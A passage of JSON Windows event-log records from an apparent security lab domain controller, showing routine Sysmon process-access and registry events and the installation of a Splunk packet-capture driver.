05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3769,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3770,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3771,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3772,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3773,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3774,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0241-5F25-0000-001029B30500}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0241-5F25-0000-001029B30500}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3775,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:48:49.516\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0241-5F25-0000-001029B30500}\r\nTargetProcessId: 5028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:48:49.516","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0241-5F25-0000-001029B30500}","TargetProcessId":"5028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-wmi.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7045,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76848,"ProcessID":856,"ThreadID":1124,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"A service was installed in the system.\r\n\r\nService Name:  npf\r\nService File Name:  C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys\r\nService Type:  kernel mode driver\r\nService Start Type:  demand start\r\nService Account:  ","ServiceName":"npf","ImagePath":"C:/Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","ServiceType":"kernel mode driver","StartType":"demand start","EventReceivedTime":"2020-08-01 05:48:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":3776,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:48:50.095\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nProcessId: 856\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\Start\r\nDetails: DWORD (0x00000003)","Category":"Registry value set (rule: RegistryEvent)","Opcode":"Info","RuleName":"T1031,T1050","UtcTime":"2020-08-01 05:48:50.095","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001020530000}","Image":"C:\\Windows\\system32\\services.exe","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\npf\\Start","Details":"DWORD (0x00000003)","EventReceivedTime":"2020-08-01 05:48:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:48:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":13,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":13,"OpcodeValue":0,"RecordNumber":3777,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-08-01 05:48:50.095\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001020530000}\r\nProcessId: 856\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\npf\\ImagePath\r\nDetails: \\??\\C:\\Program Files\\SplunkUniversalForwarder\\etc\\apps\\Splunk_TA_stream\\windows_x86_64\\bin\\npf.sys","Category":"Registry value set (rule: 